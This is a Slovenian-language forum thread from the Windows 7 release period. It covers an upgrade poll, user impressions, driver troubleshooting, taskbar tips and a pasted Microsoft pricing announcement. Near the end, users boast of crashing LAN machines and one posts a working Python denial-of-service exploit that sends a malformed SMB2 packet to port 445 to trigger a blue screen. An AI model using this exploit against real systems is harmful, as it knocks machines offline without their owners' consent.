Skoči na vsebino

Windows 7  

81 članov je glasovalo

1. 1. Ali boste ohranili sedajšnji OS ali razmišljate, da bi prešli na novega?

• OS bom nadgradil na Windows 7
      46
    • OS ne bom nadgradil, obdržal bom starega
      36

Priporočene objave

Objavljeno

ravno gor sm dau W7 RC1,

men trenutno dela VSE :D

driverji so vecinoma vsi ze notr, razn ce mas ksno res staro zadevo, bi mogu najdt driver za visto, al pa run in compatibiliti moud :)

Objavljeno
ravno gor sm dau W7 RC1,

men trenutno dela VSE :D

driverji so vecinoma vsi ze notr, razn ce mas ksno res staro zadevo, bi mogu najdt driver za visto, al pa run in compatibiliti moud :)

Ja enako tle :OK: edino sound driver me je zajebaval ker mam neko staro zvočno drugače pa bp :D

• 1 mesec pozneje...
Objavljeno

ne, samo windows 7 pa čisto pusti zadaj visto, Vienna je dosti dosti boljša ko vista.

Sam mam Vienno že na laptopu kar nekaj časa, pa še nisem mel nobene večje komplikacije z njim, všeč so mi gadgeti ki so jih dodali v 7ko, recimo Snipping tool, Action center, aja pa še to dosti bol pregledn je ko Vista.

Nikoli nisem bil fan Viste, tak da nwm kaj je fejst novega v Vienni, za mene je večina OS-a dosti boljša kot pa Vista.

Aja pa še to, dela 200% hitreje vse !

Objavljeno

Na koliko pomnilnika tako super dela? Jaz sem zaradi samo 2GB na laptopu vrgel visto dol in linux gor, ampak zaradi mešanih občutkov ne izključujem Win7 ... najbolj moteč je zanič Adobe Shockwave Flash, ki pol kurca ni vreden. In je resno moteče. Pa še kaj bi se našlo. :)

Objavljeno
Na koliko pomnilnika tako super dela? Jaz sem zaradi samo 2GB na laptopu vrgel visto dol in linux gor, ampak zaradi mešanih občutkov ne izključujem Win7 ... najbolj moteč je zanič Adobe Shockwave Flash, ki pol kurca ni vreden. In je resno moteče. Pa še kaj bi se našlo. :)

Pa ne na Linuxu? :evilgrin:

Objavljeno

Seveda, zakaj ne? Če misliš zanič flash ... naslednja reč je gadget, ki ustavi disk ob premikanju - patcha ni lahko dobit. :) Potem je tu zagoveden framework za audio, ki lahko zmixa več streamov skupaj - lahko pa tudi ne.

Linux imam, ker nisem hotel imet arhaičnega OSa (XP) in ker je bolj uporaben od skreta od viste. Če bo Win7 boljši ... :evilgrin:

Objavljeno

Everybody comes to daddy Bill ... (or daddy Steve) eventually ...

:naughty:

Znani cene in datum predstavitve operacijskega sistema Windows 7, slovenska različica že 31. oktobra

Prihajajoči operacijski sistem Windows 7 je deležen izrednega navdušenja skupnosti partnerjev, uporabnikov in razvijalcev, ki so pozdravili številne izboljšave ter nove funkcije za preprostejše delo in več zabave. Microsoft je ob tem predstavil nove podrobnosti o programu nadgradenj Windows 7 Upgrade Option, mednarodni razpoložljivosti in ceni novega operacijskega sistema. Še posebej pomembno je, da bo slovenska različica novega operacijskega sistema na voljo že 31. oktobra, le devet dni po splošni razpoložljivosti.

Prihajajoči operacijski sistem Windows 7 je deležen izrednega navdušenja skupnosti partnerjev, uporabnikov in razvijalcev, ki so pozdravili številne izboljšave ter nove funkcije za preprostejše delo in več zabave. Windows 7 bo podaljšal življenjsko dobo osebnih računalnikov, saj bo mogoče skoraj vse računalnike, združljive z Windows Visto, preprosto nadgraditi in izkoristiti vse prednosti novega operacijskega sistema. Nadgradnjo bo mogoče izvesti tudi na mnogih računalnikih s sistemom Windows XP. Microsoft je danes objavil nove podrobnosti o programu Windows 7 Upgrade Option, mednarodni razpoložljivosti, cenah in privlačnih možnostih prednaročil.

Program Windows 7 Upgrade Option

26. junija 2009 se bo uradno začel izvajati program Windows 7 Upgrade Option Program, ki bo kupcem osebnih računalnikov pri sodelujočih prodajalcih in proizvajalcih, na katerih bo nameščen operacijski sistem Windows Vista Home Premium, Business ali Ultimate, omogočil brezplačno nadgradnjo na Windows 7, ko bo ta na voljo. Program bo globalno na voljo do 31. januarja 2010, ponujeno možnost pa bo mogoče izkoristiti do konca februarja 2010. Več informacij o programu je na voljo na naslovu www.windows.com/upgradeoffer.

Mednarodna razpoložljivost

Proizvajalci originalne opreme bodo osebne računalnike z operacijskim sistemom Windows 7 lahko ponudili v vseh jezikih od 22. oktobra dalje. Istega dne bo Windows 7 na voljo tudi v maloprodaji, in sicer v 14 jezikih. Le nekaj več kot teden kasneje, 31. oktobra, bodo na police trgovin prišle še različice v vseh drugih jezikih, vključno s slovensko različico.

Cene

Microsoft ob izdaji operacijskega sistema Windows 7 v Evropski uniji sprva v maloprodaji ne bo nudil paketa za nadgradnjo. Ta odločitev je posledica izzivov, povezanih s spoštovanjem evropske zakonodaje, in odločitve podjetja, da ponudi operacijski sistem Windows 7 brez spletnega brskalnika. Kljub temu kupci v Evropi ne bodo prizadeti, saj jim bo v promocijskem obdobju, ki bo trajalo najmanj do 31. decembra 2009, v maloprodaji na voljo poln paket za ceno paketa za nadgradnjo.

Različica

Izdaja

Ocenjena maloprodajna cena za Windows 7

Promocijska cena nadgradnje

Home Premium

119,99 €

Professional

285,00 €

Ultimate

299,00 €

Polni paket

Home Premium

199,99 €

Professional

309,00 €

Ultimate

319,00 €

Objavljeno
Everybody comes to daddy Bill ... (or daddy Steve) eventually ...

:naughty:

Jah ... na strežnikih še kar nočem slišat nič o tem, delovne postaje pa ... imaš prav, nekaj romantike je minilo. Pač uporabljam, kar mi najbolje služi. :) GNU/Linux je zelo napredoval v nekaj letih (vmes sem bil več let na WinXP, že zaradi določenih win32 programov, ki jih preprosto potrebujem in so sedaj v vmware), ampak sesutje Macromedia Flasha in restart Firefoxa da spet deluje normalno vsekakor ne koristi uporabniški izkušnji. :D

Če sem iskren, me na Linux najbolj veže shell. Niti Win32 + Cygwin ne pride blizu zadevi. Ampak kot kaže, ghost sistema in test Win7 ni več daleč ... :whistle:

• 2 tedne pozneje...
Objavljeno

evo inštaliru beta verzijo windows 7 in morm rečt da sm zlo pozitivno presenečen.

edino kaj me še fucka je sound. na računalniku kaže kot da sound dela a meni zvočniki ne oddajajo nobenga zvoka.

nevem kako se imenuje firma od moje zvočne kartice zato nevem kere drajverje morm iskat- seveda če je to sploh problem.

imel že keri podobne težave alpa mogoče ve kak lahk narihtam da mi bo sound delal?

lp

Objavljeno (popravljeno)

probu že čist vse, nemorm dobit prave drajverje...

kaj naj nardim?? bom mogu res nazaj na xp prešaltat? :S

Ime osnovne plošče Intel Sandusky D945PSN

probal drajverje za visto pa še kr noče nč špilat

Popravljeno . Popravil impulz
  • 1 mesec pozneje...
Objavljeno

Kdo ve, a dela cod2 na sedmici ? :unsure:

Objavljeno

na enterprise se nism probou, na 7600 pa 7100 mi pa ni

Objavljeno

Danes sem tole ultimate naložil na novo kišto, presenečenje na polno, v pozitivnem smislu, hitrost odlična, veliko boljša od viste in xp !

Objavljeno

Če sem iskren, me na Linux najbolj veže shell. Niti Win32 + Cygwin ne pride blizu zadevi. Ampak kot kaže, ghost sistema in test Win7 ni več daleč ... :whistle:

Ko smo še veslali na wintendu smo za shell uporabljali tole: VanDyke SecureCRT

Objavljeno

probu že čist vse, nemorm dobit prave drajverje...

kaj naj nardim?? bom mogu res nazaj na xp prešaltat? :S

Ime osnovne plošče Intel Sandusky D945PSN

probal drajverje za visto pa še kr noče nč špilat

???, če si prepričan, da je naloženo, poglej v nazorni plošči, potem imaš nastavitve napačne, se zgodi, če ima grafična zvočni izhod, da ti v nastavitvah označi njeno kot privzeto

Objavljeno

zaenkrat me moti ena stvar.

sicer se mogoče da kej naštimat, al pa tudi ne.

in sicer, pri xp in visti sem imel na levi strani spodaj v taskbaru par programov (firefox itd), kjer sem lahko tapkal po njih in mi je nova okna odpiral.

pri W7 tega ni. no, je, ampak ko ga klikneš odpre samo eno okno in nič več.

se da to kej nastavit?

Objavljeno

in sicer, pri xp in visti sem imel na levi strani spodaj v taskbaru par programov (firefox itd), kjer sem lahko tapkal po njih in mi je nova okna odpiral.

se da to kej nastavit?

Nisem povsem razumel kaj bi rad, drugače pa ikono programa z miško potegneš v vrstico...

Objavljeno

se da to kej nastavit?

Klikneš z desno tipko in se ti odpre meni, kjer lahko odpreš 'new window'.

Pa še 70 uporabnih tips & tricks za windows 7. Nekaj dobrih funkcij je! :-)

Objavljeno

nism lih pogledou tistga linka ampak... ko odpres, recimo, firefox,, se ti spodej v toollbaru narise firefox knof, kliknes ga z desno - pin this program to toolbar al neki tazga... in voila, skos je tam :D

Objavljeno

hahaha :D ucer smo se mal igral... in smo najdl eno kodo v pythonu, k trigira BSOD na win7 ki so v LANu :D SMB2 ima en bug, ko sprejme illegal character....crashne :D simpl :D ampak ga nism uspel poslat iz windows masine, samo iz linux pcja heh :D

Objavljeno
#!/usr/bin/python

# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a 

# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket 

from time import sleep

host = "IP_ADDR", 445 

buff = ( 

"\x00\x00\x00\x90" # Begin SMB header: Session message

"\xff\x53\x4d\x42" # Server Component: SMB

"\x72\x00\x00\x00" # Negociate Protocol

"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853

"\x00\x26"# Process ID High: -->  normal value should be "\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"

"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"

"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"

"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"

"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"

"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"

"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"

"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"

"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"

"\x30\x30\x32\x00"

) 

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(host)

s.send(buff)

s.close()[/code]

• 2 tedne pozneje...
Objavljeno

Danes sem jih prvič inštaliral na moj desktop. Whoaa, delajo in izgledajo kot ene sorte M$jev Linux, hitro in zanesljivo. Bi moral popraviti svoj vnos v anketo, saj bom očitno le presedlal na nov sistem B)

Objavljeno

Res se opravičujem za tole glupo vprašanje pa tudi bral nisem cele teme. Ali kdo mogoče ve, kakšne so minimalne hardwerske zahteve za novo sedemko?

hvala !

Ustvarite račun ali se prijavite za komentiranje

Za objavljanje se morate najprej registrirati

Ustvarite račun

Registrirajte se! To je zelo enostavno!

Registriraj nov račun

Prijava

Že imate račun? Prijavite se tukaj.

Vpišite se
  • Zadnji brskalci   0 članov

• Noben registriran uporabnik, si ne ogleduje to stran.
  • Ustvari novo...

Pomembne informacije

Z uporabo te strani se strinjate z uporabo piškotkov in se strinjate s pravili o varovanju zasebnosti!